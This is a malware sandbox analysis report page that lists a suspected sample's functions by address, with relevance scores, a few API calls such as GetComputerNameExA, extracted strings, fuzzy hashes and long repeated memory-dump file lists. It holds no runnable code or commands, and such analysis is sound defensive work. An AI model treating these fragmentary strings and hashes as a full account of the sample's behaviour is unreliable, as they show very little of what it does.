Instruction ID: bd02f52609f96bc38af50f8626dfab8e1902e38a0ca509bf3d0f9e7f54b91466
Opcode Fuzzy Hash: 6c24714162b113239f7aa2bcd5a21c64ff2fac9590910f322828e433d867bcb8
Instruction Fuzzy Hash: A0B12BB84053058FE354DF628588FAA7BB0FB25310F1A82E9E0992F772D7748409CF96

Function 00C7C6D7 Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 614
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

iJ, xrefs: 00C7CAF5
', xrefs: 00C7CC09

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID: '$iJ
API String ID: 0-30662343
Opcode ID: 22ad7e08a7cbc5932c3031221ed17379f7e7557b0179052eb5bfa0edc7c3e1bb
Instruction ID: 12b913ab82194f8af26d45dfd7bbbfb45c4bb91e11099a75a64706558c313435
Opcode Fuzzy Hash: 22ad7e08a7cbc5932c3031221ed17379f7e7557b0179052eb5bfa0edc7c3e1bb
Instruction Fuzzy Hash: A602D47060C3D28FD729CF2990A03ABBFE1AF97304F18896DE4D997282D77985058B57

Function 00C7BFD3 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 456
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 00C7C113
GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 00C7C1D8

Strings

x, xrefs: 00C7C2F2

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID: ComputerName
String ID: x
API String ID: 3545744682-2363233923
Opcode ID: c88328d779f01ed2e2636ebc3703763431fa2974d20206683ba040edd14f66c4
Instruction ID: 22ad38e3917d5f769ca71901dba24004736b6b6d491becd935ddb8dd289a8a1c
Opcode Fuzzy Hash: c88328d779f01ed2e2636ebc3703763431fa2974d20206683ba040edd14f66c4
Instruction Fuzzy Hash: 18D1066060C7D28FD7358B3984903BBBBD1AFA7354F18856DD0D94B282D739850AD753

Function 00C597B0 Relevance: 5.4, Strings: 4, Instructions: 396
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

_P, xrefs: 00C59C05
w, xrefs: 00C5995C
EA66A9D61CD77F8D23D904AF30EFEBBC, xrefs: 00C5987B
EIFT, xrefs: 00C59875, 00C59880, 00C598C1

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID: EA66A9D61CD77F8D23D904AF30EFEBBC$EIFT$_P$w
API String ID: 0-2672830221
Opcode ID: 68fc7ed014f1ddeca9b7efd28ce94aab707b222f32d2c72d3762fe9c98889989
Instruction ID: cd796d4eafc532a7d8dd982a822a3fbcff0425e2ebd565a8bbe1cfee43864993
Opcode Fuzzy Hash: 68fc7ed014f1ddeca9b7efd28ce94aab707b222f32d2c72d3762fe9c98889989
Instruction Fuzzy Hash: E6C145756083409BD718CF35C8526AFBBE6EBD1314F188A6DE4E687391DB38C909CB16

Function 00C76170 Relevance: 5.3, Strings: 4, Instructions: 318
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8zVc, xrefs: 00C7627D
YNMZ, xrefs: 00C76446
cba`, xrefs: 00C761C1
4zVc, xrefs: 00C7621C

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID: InitializeThunk
String ID: 4zVc$8zVc$YNMZ$cba`
API String ID: 2994545307-1799417857
Opcode ID: 6186d20030fe5caa1f8a89b0a51c81f5064b52472c0d096bd8009b192218edb0
Instruction ID: 83e1d9e3f17ad18919a106b83616ef700e7978395d99d34557ecbefa6927d9c9
Opcode Fuzzy Hash: 6186d20030fe5caa1f8a89b0a51c81f5064b52472c0d096bd8009b192218edb0
Instruction Fuzzy Hash: E29177B6E04B108BD724DE25DC8272B72A6EBD0314F1DC53CE9999B252E6349D04C7D5

Function 00C587F0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 146
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 00C5897B

Strings

YO9W, xrefs: 00C58822

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID: ExitProcess
String ID: YO9W
API String ID: 621844428-386669604
Opcode ID: e8eba3f1ad2c3389221aa39194be6db6918794e066ebf940b9dd26da4e84cac2
Instruction ID: cd0b71a72754f429d86a007af09cf6e7ace1d862bfee1abf567ef55d90df0e9b
Opcode Fuzzy Hash: e8eba3f1ad2c3389221aa39194be6db6918794e066ebf940b9dd26da4e84cac2
Instruction Fuzzy Hash: A8318A77F5022907C71C79B99C4636AB5874BC4614F0F863C9DE8AB386FDB89C0842D6

Function 00C66B7E Relevance: 1.8, APIs: 1, Instructions: 335COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 610a3f6c34f992875bc1bb372f3641b4bcc0a3db573d06ee70205e31339f38ec
Instruction ID: 5d382941ea7e747643999d8271542eddca7c8730734c685cd2134678c69565f0
Opcode Fuzzy Hash: 610a3f6c34f992875bc1bb372f3641b4bcc0a3db573d06ee70205e31339f38ec
Instruction Fuzzy Hash: F3A124B5604B418FC734CF24C8D1623BBE2EF95310B098A6DD49B8B792E735E945CB51

Function 00C8E690 Relevance: 1.6, Strings: 1, Instructions: 384COMMON

Download Yara Rule

Strings

@CDE, xrefs: 00C8E8D1

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID: InitializeThunk
String ID: @CDE
API String ID: 2994545307-1513065382
Opcode ID: affa7bc2747b6539944a4d9a5efe98f3aa85fef16ac26fb13d60b29e857238ce
Instruction ID: 6b116cc5fb71158e9a2437bf35653c0d36463c149de278bccd5f34bc2f23fd35
Opcode Fuzzy Hash: affa7bc2747b6539944a4d9a5efe98f3aa85fef16ac26fb13d60b29e857238ce
Instruction Fuzzy Hash: D2B134717483414BC328EB29C8D197BBBE6EBD6318F1C893CE49687392D634DC458796

Function 00C8B480 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00C8D4FB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 00C8B4AE

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 00C67E82 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

tuv, xrefs: 00C68856

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID: tuv
API String ID: 0-2475268160
Opcode ID: d702c466a46f7b0ae3a217f2b25aff9001dcead588582ef19e1b5bffb590435c
Instruction ID: 8c663a24e7bc7ee6e49201ccc51fd568006de34e33aad0ba8af5831d4ad6c93b
Opcode Fuzzy Hash: d702c466a46f7b0ae3a217f2b25aff9001dcead588582ef19e1b5bffb590435c
Instruction Fuzzy Hash: E46163B6604300CFC7308FA4D8D2767B3E2FF95318F184A29E9A6473A0E776A908D711

Function 00C8DBD0 Relevance: 1.3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

@, xrefs: 00C8DC39

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: 83da35874207cc83fb268d86cfeb5fd833750894af658d6c73d55019768abc28
Instruction ID: a34e9d1718911820ecf5429943cd2b2e2081d75beb1a7b7cb8a8d51d6d32e10c
Opcode Fuzzy Hash: 83da35874207cc83fb268d86cfeb5fd833750894af658d6c73d55019768abc28
Instruction Fuzzy Hash: CF3103B11083049FC314EF18D8C1A6BBBF8FF95318F14892DE59687291D371D908CB9A

Function 00C59CC0 Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

\U^_, xrefs: 00C59CE5

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID: \U^_
API String ID: 0-352632802
Opcode ID: a57e4da8dc74178e329435f441bbd8feef5343c2575a7162a8dd6b667ff6eea3
Instruction ID: 3107ac5d2865bd216723d8addd16ee0487edee05abd24769b7f80544de4a7687
Opcode Fuzzy Hash: a57e4da8dc74178e329435f441bbd8feef5343c2575a7162a8dd6b667ff6eea3
Instruction Fuzzy Hash: 1211E27060D3808FD3249F349454AABBBA5EFD7744F544A2CE1C95B241C735980A8F9A

Function 00C60FD6 Relevance: .9, Instructions: 882COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac85db6504e41ec8bad30d103b7852c10bcf4da245376245838c0b332f4b41e0
Instruction ID: 397b2620755852fea43b8d3de79f18a29cd48ef8b4f612baba129a7cc9c100e8
Opcode Fuzzy Hash: ac85db6504e41ec8bad30d103b7852c10bcf4da245376245838c0b332f4b41e0
Instruction Fuzzy Hash: 5272D3B5604B408FD724DF38C4C536ABBE1AB95310F0D8A2DD8EB87792E635E549DB02

Function 00C8DCF0 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e970990a0c87777e8366570045e2eba41aeaf53ea0d51b350b60505bd2eaec2e
Instruction ID: 27f47fa2fce5c92d0cc3d467f387e954dbd562c07b4afe8d0a2f753bd4b434cd
Opcode Fuzzy Hash: e970990a0c87777e8366570045e2eba41aeaf53ea0d51b350b60505bd2eaec2e
Instruction Fuzzy Hash: 537169326043119FC714BE29C850A3FB3A6EFD5754F19C43DE5878B2A5EB309D419786

Function 00C89B90 Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

